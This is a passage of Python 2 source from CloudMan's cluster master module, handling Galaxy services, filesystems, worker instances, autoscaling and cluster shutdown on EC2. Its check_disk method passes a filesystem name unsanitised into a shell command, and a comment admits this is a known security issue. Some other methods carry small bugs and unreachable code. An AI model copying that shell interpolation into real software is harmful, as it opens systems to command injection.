except Exception, e:
log.error(
"Error processing filesystems in existing cluster configuration: %s" % e)
self.manager_started = False
return False
def add_preconfigured_applications(self):
"""
Dynamically add any previously available applications to the service
registry, which will in turn start those apps. The service list is
extracted from the user data.
Note that this method is automatically called when an existing cluster
is being recreated.
In order for the dynamic service loading to work, there are some requirements
on the structure of user data and services themselves. Namely, user data
must contain a name for the service. The service implementation must be in
a module inside ``cm.services.apps`` and it must match the service name
(e.g., ``cm.services.apps.proftpd``). The provided service/file name must
match the service class without the "Service" string. For example, if service
name is ``ProFTPd``, file name must be proftpd.py and the service class
name must be ``ProFTPdService``, properly capitilized.
"""
try:
ok = True # Flag keeping up with progress
# Process the current cluster config
log.debug("Processing previously-available application services in "
"an existing cluster config")
# TODO: Should we inspect a provided path for service availability vs. UD only?
if "services" in self.app.ud:
log.debug("Previously-available applications: {0}"
.format(self.app.ud['services']))
for srvc in self.app.ud['services']:
service_class = None
svc_name = srvc.get('name', None)
if svc_name:
# Import service module and get a reference to the service object
try:
module_name = svc_name.lower()
svc_name += "Service" # Service class name must match this str!
module = __import__('cm.services.apps.' + module_name,
fromlist=[svc_name])
service_class = getattr(module, svc_name)
except Exception, e:
log.warning("Trouble importing service class {0}: {1}"
.format(svc_name, e))
if service_class:
# Add the service into the service registry
self.add_master_service(service_class(self.app))
else:
ok = False
log.warning("Could not find service class matching "
"userData service entry: %s" % svc_name)
return ok
except Exception, e:
log.error("Error processing applications in existing cluster configuration: %s" % e)
self.manager_started = False
return False
def get_vol_if_fs(self, attached_volumes, filesystem_name):
"""
Iterate through the list of (attached) volumes and check if any
one of them match the current cluster name and filesystem (as stored
in volume's tags). Return a matching volume (as a ``boto`` object) or
``None``.
*Note* that this method returns the first matching volume and will thus
not work for filesystems composed of multiple volumes.
"""
for vol in attached_volumes:
log.debug("Checking if vol '{0}' is file system '{1}'".format(
vol.id, filesystem_name))
if self.app.cloud_interface.get_tag(vol, 'clusterName') == self.app.ud['cluster_name'] \
and self.app.cloud_interface.get_tag(vol, 'filesystem') == filesystem_name:
log.debug("Identified attached volume '%s' as filesystem '%s'" % (
vol.id, filesystem_name))
return vol
return None
def start_autoscaling(self, as_min, as_max, instance_type):
as_svc = self.get_services(svc_role=ServiceRole.AUTOSCALE)
if not as_svc:
self.add_master_service(
Autoscale(self.app, as_min, as_max, instance_type))
else:
log.debug("Autoscaling is already on.")
as_svc = self.get_services(svc_role=ServiceRole.AUTOSCALE)
log.debug(as_svc[0])
def stop_autoscaling(self):
as_svc = self.get_services(svc_role=ServiceRole.AUTOSCALE)
if as_svc:
self.remove_master_service(as_svc[0])
else:
log.debug("Not stopping autoscaling because it is not on.")
def adjust_autoscaling(self, as_min, as_max):
as_svc = self.get_services(svc_role=ServiceRole.AUTOSCALE)
if as_svc:
as_svc[0].as_min = int(as_min)
as_svc[0].as_max = int(as_max)
log.debug("Adjusted autoscaling limits; new min: %s, new max: %s" % (as_svc[
0].as_min, as_svc[0].as_max))
else:
log.debug(
"Cannot adjust autoscaling because autoscaling is not on.")
# DBTODO For now this is a quick fix to get a status.
# Define what 'yellow' would be, and don't just count on "Filesystem"
# being the only data service.
def get_data_status(self):
fses = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
if fses != []:
for fs in fses:
if fs.state == service_states.ERROR:
return "red"
elif fs.state != service_states.RUNNING:
return "yellow"
return "green"
else:
return "nodata"
def get_app_status(self):
count = 0
for svc in self.get_services(svc_type=ServiceType.APPLICATION):
count += 1
if svc.state == service_states.ERROR:
return "red"
elif not (svc.state == service_states.RUNNING or svc.state == service_states.COMPLETED):
return "yellow"
if count != 0:
return "green"
else:
return "nodata"
def get_services(self, svc_type=None, svc_role=None, svc_name=None):
"""
Returns all services that best match given service type, role and name.
If service name is specified, it is matched first.
Next, if a role is specified, returns all services containing that role.
Lastly, if svc_role is ``None``, but a ``svc_type`` is specified, returns
all services matching type.
"""
svcs = []
for s in self.services:
if s.name is None: # Sanity check
log.error("A name has not been assigned to the service. A value must be assigned to the svc.name property.")
elif s.name == svc_name:
return [s] # Only one match possible - so return it immediately
elif svc_role in s.svc_roles:
svcs.append(s)
elif s.svc_type == svc_type and svc_role is None:
svcs.append(s)
return svcs
def all_fs_status_text(self):
return []
# FIXME: unreachable code
tr = []
for key, vol in self.volumes.iteritems():
if vol[3] is None:
tr.append("%s+nodata" % key)
else:
if vol[3] is True:
tr.append("%s+green" % key)
else:
tr.append("%s+red" % key)
return tr
def all_fs_status_array(self):
return []
# FIXME: unreachable code
tr = []
for key, vol in self.volumes.iteritems():
if vol[3] is None:
tr.append([key, "nodata"])
else:
if vol[3] is True:
tr.append([key, "green"])
else:
tr.append([key, "red"])
return tr
def fs_status_text(self):
"""fs_status"""
good_count = 0
bad_count = 0
fsarr = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
if len(fsarr) == 0:
return "nodata"
# DBTODO Fix this conflated volume/filesystem garbage.
for fs in fsarr:
if fs.state == service_states.RUNNING:
good_count += 1
else:
bad_count += 1
if good_count == len(fsarr):
return "green"
elif bad_count > 0:
return "red"
else:
return "yellow"
def pg_status_text(self):
"""pg_status"""
svcarr = self.get_services(svc_role=ServiceRole.GALAXY_POSTGRES)
if len(svcarr) > 0:
if svcarr[0].state == service_states.RUNNING:
return "green"
else:
return "red"
else:
return "nodata"
def sge_status_text(self):
"""sge_status"""
svcarr = self.get_services(svc_role=ServiceRole.SGE)
if len(svcarr) > 0:
if svcarr[0].state == service_states.RUNNING:
return "green"
else:
return "red"
else:
return "nodata"
def galaxy_status_text(self):
"""galaxy_status"""
svcarr = self.get_services(svc_role=ServiceRole.GALAXY)
if len(svcarr) > 0:
if svcarr[0].state == service_states.RUNNING:
return "green"
else:
return "red"
else:
return "nodata"
def get_srvc_status(self, srvc):
"""
Get the status a service ``srvc``. If the service is not a recognized as
a CloudMan-service, return ``Service not recognized``. If the service is
not currently running (i.e., not currently recognized by CloudMan as a
service it should be managing), return ``Service not found``.
"""
svcarr = self.get_services(svc_name=srvc)
svcarr = [s for s in svcarr if (s.svc_type == ServiceType.FILE_SYSTEM or ServiceRole.fulfills_roles(
s.svc_roles, [ServiceRole.GALAXY, ServiceRole.SGE, ServiceRole.GALAXY_POSTGRES]))]
if len(svcarr) > 0:
return srvc[0].state
else:
return "'%s' is not running" % srvc
return "Service '%s' not recognized." % srvc
@TestFlag([{"size_used": "184M", "status": "Running", "kind": "Transient",
"mount_point": "/mnt/transient_nfs", "name": "transient_nfs", "err_msg": None,
"device": "/dev/vdb", "size_pct": "1%", "DoT": "Yes", "size": "60G",
"persistent": "No"},
{"size_used": "33M", "status": "Running", "kind": "Volume",
"mount_point": "/mnt/galaxyData", "name": "galaxyData", "snapshot_status": None,
"err_msg": None, "snapshot_progress": None, "from_snap": "snap-galaxyFS",
"volume_id": "vol-0000000d", "device": "/dev/vdc", "size_pct": "4%",
"DoT": "No", "size": "1014M", "persistent": "Yes"},
{"size_used": "52M", "status": "Configuring", "kind": "Volume",
"mount_point": "/mnt/galaxyData", "name": "galaxyDataResize",
"snapshot_status": "pending", "err_msg": None, "persistent": "Yes",
"snapshot_progress": "10%", "from_snap": "snap-760fd33d",
"volume_id": "vol-d5f3f9a9", "device": "/dev/sdh", "size_pct": "2%",
"DoT": "No", "size": "5.0G"}], quiet=True)
def get_all_filesystems_status(self):
"""
Get a list and information about each of the file systems currently
managed by CloudMan.
"""
fss = []
fs_svcs = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
for fs in fs_svcs:
fss.append(fs.get_details())
return fss
# return []
# TEMP only; used to alternate input on the UI
# r = random.choice([1, 2, 3])
r = 4
log.debug("Dummy random #: %s" % r)
dummy = [{"name": "galaxyData",
"status": "Running",
"device": "/dev/sdg1",
"kind": "volume",
"mount_point": "/mnt/galaxyData",
"DoT": "No",
"size": "20G",
"size_used": "2G",
"size_pct": "90%",
"error_msg": None,
"volume_id": "vol-dbi23ins"}]
if r == 2 or r == 4:
dummy.append(
{"name": "1000g", "status": "Removing", "bucket_name": "1000genomes",
"kind": "bucket", "mount_point": "/mnt/100genomes", "DoT": "No",
"size": "N/A", "NFS_shared": True, "size_used": "", "size_pct": "", "error_msg": None})
if r == 3:
dummy[0]['status'] = "Adding"
if r == 4: # NGTODO: Hardcoded links below to tools and indices?
dummy.append({"name": "galaxyTools", "status": "Available", "device": "/dev/sdg3",
"kind": "snapshot", "mount_point": "/mnt/galaxyTools", "DoT": "Yes",
"size": "10G", "size_used": "1.9G", "size_pct": "19%",
"error_msg": None, "from_snap": "snap-bdr2whd"})
dummy.append({"name": "galaxyIndices", "status": "Error", "device": "/dev/sdg2",
"kind": "snapshot", "mount_point": "/mnt/galaxyIndices", "DoT": "Yes",
"size": "700G", "NFS_shared": True, "size_used": "675G", "size_pct": "96%",
"error_msg": "Process returned 2", "from_snap": "snap-89r23hd"})
dummy.append({"name": "custom", "status": "Available", "device": "/dev/sdg4",
"kind": "Volume", "mount_point": "/mnt/custom", "DoT": "No",
"size": "70G", "NFS_shared": True, "size_used": "53G", "size_pct": "7%",
"error_msg": ""})
return dummy
@TestFlag({"SGE": "Running", "Postgres": "Running", "Galaxy": "TestFlag",
"Filesystems": "Running"}, quiet=True)
def get_all_services_status(self):
"""
Return a dictionary containing a list of currently running service and
their status.
For example::
{"Postgres": "Running", "SGE": "Running", "Galaxy": "Running",
"Filesystems": "Running"}
"""
status_dict = {}
for srvc in self.services:
status_dict[srvc.name] = srvc.state # NGTODO: Needs special handling for file systems
return status_dict
def get_galaxy_rev(self):
"""
Get the Mercurial revision of the Galaxy instance that's running as a
CloudMan-managed service.
Return a string with either the revision (e.g., ``5757:963e73d40e24``)
or ``N/A`` if unable to get the revision number.
"""
cmd = "%s - galaxy -c \"cd %s; hg tip | grep -m 1 changeset | cut -d':' -f2,3\"" % (
paths.P_SU, self.app.path_resolver.galaxy_home)
process = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = process.communicate()
if out[1] != '':
rev = 'N/A'
else:
rev = out[0].strip()
return rev
def get_galaxy_admins(self):
admins = 'None'
try:
config_file = open(os.path.join(
self.app.path_resolver.galaxy_home, 'universe_wsgi.ini'), 'r').readlines()
for line in config_file:
if 'admin_users' in line:
admins = line.split('=')[1].strip()
break
except IOError:
pass
return admins
def get_permanent_storage_size(self):
pss = 0
fs_arr = self.get_services(svc_role=ServiceRole.GALAXY_DATA)
for fs in fs_arr:
for vol in fs.volumes:
pss += int(vol.size)
return pss
def check_disk(self):
try:
fs_arr = self.get_services(svc_role=ServiceRole.GALAXY_DATA)
if len(fs_arr) > 0:
fs_name = fs_arr[0].name
# NGTODO: Definite security issue here. After discussion with Enis, clients are considered trusted for now.
# We may later have to think about sanitizing/securing/escaping user input if the issue arises.
disk_usage = commands.getoutput("df -h | grep %s$ | awk '{print $2, $3, $5}'" % fs_name)
disk_usage = disk_usage.split(' ')
if len(disk_usage) == 3:
self.disk_total = disk_usage[0]
self.disk_used = disk_usage[1]
self.disk_pct = disk_usage[2]
except Exception, e:
log.error("Failure checking disk usage. %s" % e)
def get_cluster_status(self):
return self.cluster_status
def toggle_master_as_exec_host(self, force_removal=False):
""" By default, the master instance running all the services is also
an execution host and is used to run jobs. This method allows one
to toggle the master instance from being an execution host.
:type force_removal: bool
:param force_removal: If True, go through the process of removing
the instance from being an execution host
irrespective of the instance's current state.
:rtype: bool
:return: True if the master instance is set to be an execution host.
False otherwise.
"""
sge_svc = self.get_services(svc_role=ServiceRole.SGE)[0]
if sge_svc.state == service_states.RUNNING:
if self.master_exec_host is True or force_removal:
self.master_exec_host = False
if not sge_svc._remove_instance_from_exec_list(
self.app.cloud_interface.get_instance_id(),
self.app.cloud_interface.get_private_ip()):
# If the removal was unseccessful, reset the flag
self.master_exec_host = True
else:
self.master_exec_host = True
if not sge_svc._add_instance_as_exec_host(
self.app.cloud_interface.get_instance_id(),
self.app.cloud_interface.get_private_ip()):
# If the removal was unseccessful, reset the flag
self.master_exec_host = False
else:
log.warning(
"SGE not running thus cannot toggle master as exec host")
if self.master_exec_host:
log.info("The master instance has been set to execute jobs. To manually change this, use the cloudman admin panel.")
else:
log.info("The master instance has been set to *not* execute jobs. To manually change this, use the cloudman admin panel.")
return self.master_exec_host
def get_worker_instances(self):
instances = []
if self.app.TESTFLAG is True:
# for i in range(5):
# instance = Instance( self.app, inst=None, m_state="Pending" )
# instance.id = "WorkerInstance"
# instances.append(instance)
return instances
log.debug(
"Trying to discover any worker instances associated with this cluster...")
filters = {'tag:clusterName': self.app.ud['cluster_name'],
'tag:role': 'worker'}
try:
reservations = self.app.cloud_interface.get_all_instances(filters=filters)
for reservation in reservations:
if reservation.instances[0].state != 'terminated' and reservation.instances[0].state != 'shutting-down':
i = Instance(self.app, inst=reservation.instances[0],
m_state=reservation.instances[0].state, reboot_required=True)
instances.append(i)
log.info("Instance '%s' found alive (will configure it later)." % reservation.instances[0].id)
except EC2ResponseError, e:
log.debug("Error checking for live instances: %s" % e)
return instances
@TestFlag([])
def get_attached_volumes(self):
"""
Get a list of block storage volumes currently attached to this instance.
"""
log.debug(
"Trying to discover any volumes attached to this instance...")
attached_volumes = []
# TODO: Abstract filtering into the cloud interface classes
try:
if self.app.cloud_type == 'ec2':
# filtering w/ boto is supported only with ec2
f = {'attachment.instance-id':
self.app.cloud_interface.get_instance_id()}
attached_volumes = self.app.cloud_interface.get_ec2_connection()\
.get_all_volumes(filters=f)
else:
volumes = self.app.cloud_interface.get_ec2_connection().get_all_volumes()
for vol in volumes:
if vol.attach_data.instance_id == self.app.cloud_interface.get_instance_id():
attached_volumes.append(vol)
except EC2ResponseError, e:
log.debug("Error checking for attached volumes: %s" % e)
log.debug("Attached volumes: %s" % attached_volumes)
# Add ``clusterName`` tag to any attached volumes
for att_vol in attached_volumes:
self.app.cloud_interface.add_tag(att_vol, 'clusterName', self.app.ud['cluster_name'])
return attached_volumes
@TestFlag(None)
def shutdown(self, sd_apps=True, sd_filesystems=True, sd_instances=True,
sd_autoscaling=True, delete_cluster=False, sd_spot_requests=True,
rebooting=False):
"""
Shut down this cluster. This means shutting down all the services
(dependent on method arguments) and, optionally, deleting the cluster.
.. seealso:: `~cm.util.master.delete_cluster`
"""
log.debug("List of services before shutdown: %s" % [
s.get_full_name() for s in self.services])
self.cluster_status = cluster_status.SHUTTING_DOWN
# Services need to be shut down in particular order
if sd_autoscaling:
self.stop_autoscaling()
if sd_instances:
self.stop_worker_instances()
if sd_spot_requests:
for wi in self.worker_instances:
if wi.is_spot() and not wi.spot_was_filled():
wi.terminate()
# full_svc_list = self.services[:] # A copy to ensure consistency
if sd_apps:
for svc in self.get_services(svc_type=ServiceType.APPLICATION):
log.debug("Initiating removal of service {0}".format(svc.name))
svc.remove()
if sd_filesystems:
for svc in self.get_services(svc_type=ServiceType.FILE_SYSTEM):
log.debug("Initiating removal of file system service {0}".format(svc.name))
svc.remove(synchronous=True, delete_devices=delete_cluster)
# Wait for all the services to shut down before declaring the cluster shut down
# (but don't wait indefinitely)
# This is required becasue with the file systems being removed in parallel via
# separate threads, those processes may not have completed by the time the
# complete shutdown does.
time_limit = 300 # wait for max 5 mins before shutting down
while(time_limit > 0):
log.debug("Waiting ({0} more seconds) for all the services to shut down.".format(
time_limit))
num_off = 0
for srvc in self.services:
if srvc.state == service_states.SHUT_DOWN or srvc.state == service_states.ERROR or \
srvc.state == service_states.UNSTARTED:
num_off += 1
if num_off == len(self.services):
log.debug("All services shut down")
break
elif rebooting and self.app.cloud_type == 'ec2':
# For the EC2 cloud it's ok to reboot with volumes attached
log.debug("Not waiting for all the services to shut down because we're just rebooting.")
break
sleep_time = 6
time.sleep(sleep_time)
time_limit -= sleep_time
# Automatically delete transient clusters on terminate (because no data
# will persist so no point in poluting the list of buckets)
if delete_cluster or (self.cluster_storage_type == 'transient' and not rebooting):
self.delete_cluster()
self.cluster_status = cluster_status.TERMINATED
log.info("Cluster %s shut down at %s (uptime: %s). If not done automatically, "
"manually terminate the master instance (and any remaining instances "
"associated with this cluster) from the %s cloud console."
% (self.app.ud['cluster_name'], Time.now(), (Time.now() - self.startup_time),
self.app.ud.get('cloud_name', '')))
def reboot(self, soft=False):
"""
Reboot the entire cluster, first shutting down appropriate services.
"""
if self.app.TESTFLAG is True:
log.debug("Restart the cluster but the TESTFLAG is set")
return False
# Spot requests cannot be tagged and thus there is no good way of associating those
# back with a cluster after a reboot so cancel those
log.debug("Initiating cluster reboot.")
# Don't detach volumes only on the EC2 cloud
sd_filesystems = True
if self.app.cloud_type == 'ec2':
sd_filesystems = False
self.shutdown(sd_filesystems=sd_filesystems, sd_instances=False, rebooting=True)
if soft:
if misc.run("{0} restart".format(os.path.join(self.app.ud['boot_script_path'],
self.app.ud['boot_script_name']))):
return True
else:
log.error(
"Trouble restarting CloudMan softly; rebooting instance now.")
ec2_conn = self.app.cloud_interface.get_ec2_connection()
try:
log.debug("Rebooting self now...")
ec2_conn.reboot_instances(
[self.app.cloud_interface.get_instance_id()])
return True
except EC2ResponseError, e:
log.error("Error rebooting master instance (i.e., self): %s" % e)
return False
def terminate_master_instance(self, delete_cluster=False):
"""
Terminate the master instance using the cloud middleware API.
If ``delete_cluster`` is set to ``True``, delete all cluster
components before terminating the instance.
.. seealso:: `~cm.util.master.delete_cluster`
"""
if self.cluster_status != cluster_status.TERMINATED:
self.shutdown(delete_cluster=delete_cluster)
log.debug("Terminating the master instance")
self.app.cloud_interface.terminate_instance(
self.app.cloud_interface.get_instance_id())
def delete_cluster(self):
"""
Completely delete this cluster. This involves deleting the cluster's
bucket as well as volumes containing user data file system(s)! The
list of volumes to be deleted can either be provided as an argument or,
for the case of EC2 only, will be automatically derived.
.. warning::
This action is irreversible. All data will be permanently deleted.
"""
log.info("All services shut down; deleting this cluster.")
# Delete any remaining volume(s) assoc. w/ the current cluster
try:
if self.app.cloud_type == 'ec2':
filters = {'tag:clusterName': self.app.ud['cluster_name']}
vols = self.app.cloud_interface.get_all_volumes(filters=filters)
log.debug("Remaining volumes associated with this cluster: {0}".format(vols))
for vol in vols:
if vol.status == 'available':
log.debug("As part of cluster deletion, deleting volume '%s'" % vol.id)
vol.delete()
else:
log.debug("Not deleting volume {0} because it is in state {1}"
.format(vol.id, vol.status))
except EC2ResponseError, e:
log.error("Error deleting a volume: %s" % e)
# Delete cluster bucket on S3
s3_conn = self.app.cloud_interface.get_s3_connection()
if s3_conn:
misc.delete_bucket(s3_conn, self.app.ud['bucket_cluster'])
def clean(self):
"""
Clean the system as if it was freshly booted. All services are shut down
and any changes made to the system since service start are reverted (this
excludes any data on user data file system).
"""
log.debug("Cleaning the system - all services going down")
# TODO: #NGTODO: Possibility of simply calling remove on ServiceType.FILE_SYSTEM
# service so that all dependencies are automatically removed?
svcs = self.get_services(svc_role=ServiceRole.GALAXY)
for service in svcs:
service.remove()
svcs = self.get_services(svc_role=ServiceRole.GALAXY_POSTGRES)
for service in svcs:
service.remove()
self.stop_worker_instances()
svcs = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
for service in svcs:
service.clean()
svcs = self.get_services(svc_role=ServiceRole.SGE)
for service in svcs:
service.clean()
def get_idle_instances(self):
"""
Get a list of instances that are currently not executing any job manager
jobs. Return a list of ``Instance`` objects.
"""
# log.debug( "Looking for idle instances" )
idle_instances = [] # List of Instance objects corresponding to idle instances
if os.path.exists('%s/default/common/settings.sh' % self.app.path_resolver.sge_root):
proc = subprocess.Popen("export SGE_ROOT=%s; . $SGE_ROOT/default/common/settings.sh; "
"%s/bin/lx24-amd64/qstat -f | grep all.q" % (
self.app.path_resolver.sge_root, self.app.path_resolver.sge_root),
shell=True, stdout=subprocess.PIPE)
qstat_out = proc.communicate()[0]
# log.debug( "qstat output: %s" % qstat_out )
instances = qstat_out.splitlines()
nodes_list = [] # list of nodes containing node's domain name and number of used processing slots
idle_instances_dn = [] # list of domain names of idle instances
for inst in instances:
# Get instance domain name and # of used processing slots: ['domU-12-31-38-00-48-D1.c:0']
nodes_list.append(inst.split('@')[1].split(' ')[0] + ':' + inst.split('/')[1])
# if len( nodes_list ) > 0:
# log.debug( "Processed qstat output: %s" % nodes_list )
for node in nodes_list:
# If number of used slots on given instance is 0, mark it as idle
if int(node.split(':')[1]) == 0:
idle_instances_dn.append(node.split(':')[0])
# if len( idle_instances_dn ) > 0:
# log.debug( "Idle instances' DNs: %s" % idle_instances_dn )
for idle_instance_dn in idle_instances_dn:
for w_instance in self.worker_instances:
# log.debug("Trying to match worker instance with private IP '%s' to idle "
# "instance '%s'" % (w_instance.get_local_hostname(), idle_instance_dn))
if w_instance.get_local_hostname() is not None:
if w_instance.get_local_hostname().lower().startswith(str(idle_instance_dn).lower()):
# log.debug("Marking instance '%s' with FQDN '%s' as idle." \
# % (w_instance.id, idle_instance_dn))
idle_instances.append(w_instance)
return idle_instances
def remove_instances(self, num_nodes, force=False):
"""
Remove a number (``num_nodes``) of worker instances from the cluster, first
deciding which instance(s) to terminate and then removing them from SGE and
terminating. An instance is deemed removable if it is not currently running
any jobs.
Note that if the number of removable instances is smaller than the
number of instances requested to remove, the smaller number of instances
is removed. This can be overridden by setting ``force`` to ``True``. In that
case, removable instances are removed first, then additional instances are
chosen at random and removed.
"""
num_terminated = 0
# First look for idle instances that can be removed
idle_instances = self.get_idle_instances()
if len(idle_instances) > 0:
log.debug("Found %s idle instances; trying to remove %s." %
(len(idle_instances), num_nodes))
for i in range(0, num_nodes):
for inst in idle_instances:
if num_terminated < num_nodes:
self.remove_instance(inst.id)
num_terminated += 1
else:
log.info("No idle instances found")
log.debug("Num to terminate: %s, num terminated: %s; force set to '%s'"
% (num_nodes, num_terminated, force))
# If force is set, terminate requested number of instances regardless
# whether they are idle
if force is True and num_terminated < num_nodes:
force_kill_instances = num_nodes - num_terminated
log.info(
"Forcefully terminating %s instances." % force_kill_instances)
for i in range(force_kill_instances):
for inst in self.worker_instances:
if not inst.is_spot() or inst.spot_was_filled():
self.remove_instance(inst.id)
num_terminated += 1
if num_terminated > 0:
log.info("Initiated requested termination of instances. Terminating '%s' instances."
% num_terminated)
else:
log.info("Did not terminate any instances.")
def remove_instance(self, instance_id=''):
"""
Remove an instance with ID ``instance_id`` from the cluster. This means
that the instance is first removed from the job manager as a worker and
then it is terminated via cloud middleware API.
"""
if instance_id == '':
log.warning(
"Tried to remove an instance but did not receive instance ID")
return False
log.debug("Specific termination of instance '%s' requested." % instance_id)
for inst in self.worker_instances:
if inst.id == instance_id:
sge_svc = self.get_services(svc_role=ServiceRole.SGE)[0]
# DBTODO Big problem here if there's a failure removing from allhosts. Need to handle it.
# if sge_svc.remove_sge_host(inst.get_id(), inst.get_private_ip()) is True:
# Best-effort PATCH until above issue is handled
if inst.get_id() is not None:
sge_svc.remove_sge_host(
inst.get_id(), inst.get_private_ip())
# Remove the given instance from /etc/hosts files
log.debug("Removing instance {0} from /etc/hosts".format(
inst.get_id()))
for line in fileinput.input('/etc/hosts', inplace=1):
line = line.strip()
# (print all lines except the one w/ instance IP back to the file)
if not inst.private_ip in line:
print line
try:
inst.terminate()
except EC2ResponseError, e:
log.error("Trouble terminating instance '{0}': {1}".format(
instance_id, e))
log.info("Initiated requested termination of instance. Terminating '%s'." %
instance_id)
def reboot_instance(self, instance_id='', count_reboot=True):
"""
Using cloud middleware API, reboot instance with ID ``instance_id``.
``count_reboot`` indicates whether this count should be counted toward
the instance ``self.config.instance_reboot_attempts`` (see `Instance`
`reboot` method).
"""
if instance_id == '':
log.warning("Tried to reboot an instance but did not receive instance ID")
return False
log.info("Specific reboot of instance '%s' requested." % instance_id)
for inst in self.worker_instances:
if inst.id == instance_id:
inst.reboot(count_reboot=count_reboot)
log.info("Initiated requested reboot of instance. Rebooting '%s'." % instance_id)
def add_instances(self, num_nodes, instance_type='', spot_price=None):
# Remove master from execution queue automatically
if self.master_exec_host:
self.toggle_master_as_exec_host()
self.app.cloud_interface.run_instances(num=num_nodes,
instance_type=instance_type,
spot_price=spot_price)
def add_live_instance(self, instance_id):
"""
Add an existing instance to the list of worker instances tracked by the master;
get a handle to the instance object in the process.
"""
try:
log.debug("Adding live instance '%s'" % instance_id)
reservation = self.app.cloud_interface.get_all_instances(instance_id)
if reservation and len(reservation[0].instances) == 1:
instance = reservation[0].instances[0]
if instance.state != 'terminated' and instance.state != 'shutting-down':
i = Instance(self.app, inst=instance, m_state=instance.state)
self.app.cloud_interface.add_tag(instance, 'clusterName',
self.app.ud['cluster_name'])
# Default to 'worker' role tag
self.app.cloud_interface.add_tag(instance, 'role', 'worker')
self.app.cloud_interface.add_tag(instance, 'Name',
"Worker: {0}".format(self.app.ud['cluster_name']))
self.worker_instances.append(i)
i.send_alive_request() # to make sure info like ip-address and hostname are updated
log.debug('Added instance {0}....'.format(instance_id))
else:
log.debug("Live instance '%s' is at the end of its life (state: %s); not adding the instance." %
(instance_id, instance.state))
return True
except EC2ResponseError, e:
log.debug(
"Problem adding a live instance (tried ID: %s): %s" % (instance_id, e))
return False
@TestFlag(None)
def init_cluster(self, cluster_type, pss=0, storage_type='volume'):
"""
Initialize the type for this cluster and start appropriate services,
storing the cluster configuration into the cluster's bucket.
This method applies only to a new cluster.
:type cluster_type: string
:param cluster_type: Type of cluster being setup. Currently, accepting
values ``Galaxy``, ``Data``, or ``SGE``
:type pss: int
:param pss: Persistent Storage Size associated with data volumes being
created for the cluster
"""
def _add_data_fs():
"""
A local convenience method used to add a new file system
"""
if self.get_services(svc_role=ServiceRole.GALAXY_DATA):
return
fs_name = ServiceRole.to_string(ServiceRole.GALAXY_DATA)
log.debug("Creating a new data filesystem: '%s'" % fs_name)
fs = Filesystem(
self.app, fs_name, svc_roles=[ServiceRole.GALAXY_DATA])
fs.add_volume(size=pss)
self.add_master_service(fs)
self.cluster_status = cluster_status.STARTING
self.initial_cluster_type = cluster_type
self.cluster_storage_type = storage_type
msg = "Initializing '{0}' cluster type with storage type '{1}'. Please wait...".format(cluster_type, storage_type)
log.info(msg)
self.app.msgs.info(msg)
if cluster_type == 'Galaxy':
# Turn those data sources into file systems
if self.snaps:
attached_volumes = self.get_attached_volumes()
for snap in [s for s in self.snaps if 'name' in s]:
if 'roles' in snap:
fs = Filesystem(self.app, snap['name'],
svc_roles=ServiceRole.from_string_array(snap['roles']))
# Check if an already attached volume maps to the current filesystem
att_vol = self.get_vol_if_fs(attached_volumes, snap['name'])
if att_vol:
log.debug("{0} file system has volume(s) already attached".format(
snap['name']))
fs.add_volume(vol_id=att_vol.id,
size=att_vol.size, from_snapshot_id=att_vol.snapshot_id)
# snap_size = att_vol.size
elif 'snap_id' in snap:
log.debug("There are no volumes already attached for file system {0}"
.format(snap['name']))
size = 0
if ServiceRole.GALAXY_DATA in ServiceRole.from_string_array(snap['roles']):
size = pss
fs.add_volume(size=size, from_snapshot_id=snap['snap_id'])
# snap_size = snap.get('size', 0)
elif 'type' in snap:
if 'archive' == snap['type'] and 'archive_url' in snap:
log.debug("Attaching a volume based on an archive named {0}"
.format(snap['name']))
if storage_type == 'volume':
if 'size' in snap:
size = snap['size']
if ServiceRole.GALAXY_DATA in ServiceRole.from_string_array(snap['roles']):
if pss > snap['size']:
size = pss
from_archive = {'url': snap['archive_url'],
'md5_sum': snap.get('archive_md5', None)}
fs.add_volume(size=size, from_archive=from_archive)
else:
log.error("Format error in snaps.yaml file. No size specified for volume based on archive {0}"
.format(snap['name']))
elif storage_type == 'transient':
from_archive = {'url': snap['archive_url'],
'md5_sum': snap.get('archive_md5', None)}
fs.add_transient_storage(from_archive=from_archive)
else:
log.error("Unknown storage type {0} for archive extraction."
.format(storage_type))
elif 'gluster' == snap['type'] and 'server' in snap:
log.debug("Attaching a glusterfs based filesystem named {0}"
.format(snap['name']))
fs.add_glusterfs(snap['server'], mount_options=snap.get('mount_options', None))
elif 'nfs' == snap['type'] and 'server' in snap:
log.debug("Attaching an nfs based filesystem named {0}"
.format(snap['name']))
fs.add_nfs(snap['server'], None, None, mount_options=snap.get('mount_options', None))
elif 's3fs' == snap['type'] and 'bucket_name' in snap and 'bucket_a_key' in snap and 'bucket_s_key' in snap:
fs.add_bucket(snap['bucket_name'], snap['bucket_a_key'], snap['bucket_s_key'])
else:
log.error("Format error in snaps.yaml file. Unrecognised or improperly configured type '{0}' for fs named: {1}"
.format(snap['type]'], snap['name']))
log.debug("Adding a filesystem '{0}' with volumes '{1}'"
.format(fs.get_full_name(), fs.volumes))
self.add_master_service(fs)
# Add a file system for user's data
if self.app.use_volumes:
_add_data_fs()
# Add PostgreSQL service
self.add_master_service(PostgresService(self.app))
# Add ProFTPd service
self.add_master_service(ProFTPdService(self.app))
# Add Galaxy service
self.add_master_service(GalaxyService(self.app))
# Add Galaxy Reports service
self.add_master_service(GalaxyReportsService(self.app))
elif cluster_type == 'Data':
# Add a file system for user's data if one doesn't already exist
_add_data_fs()
elif cluster_type == 'SGE':
# SGE service is automatically added at cluster start (see
# ``start`` method)
pass
else:
log.error("Tried to initialize a cluster but received an unknown type: '%s'"
% cluster_type)
@TestFlag(True)
@synchronized(s3_rlock)
def init_shared_cluster(self, share_string):
"""
Initialize a new (i.e., derived) cluster from a shared one, whose details
need to be provided in the ``share_string`` (e.g.,
``cm-808d863548acae7c2328c39a90f52e29/shared/2012-09-17--19-47``)
This method can only be called at a new cluster start.
"""
self.cluster_status = cluster_status.STARTING
log.debug("Initializing a shared cluster from '%s'" % share_string)
s3_conn = self.app.cloud_interface.get_s3_connection()
ec2_conn = self.app.cloud_interface.get_ec2_connection()
try:
share_string = share_string.strip('/')
bucket_name = share_string.split('/')[0]
cluster_config_prefix = os.path.join(
share_string.split('/')[1], share_string.split('/')[2])
except Exception, e:
log.error("Error while parsing provided shared cluster's bucket '%s': %s" % (
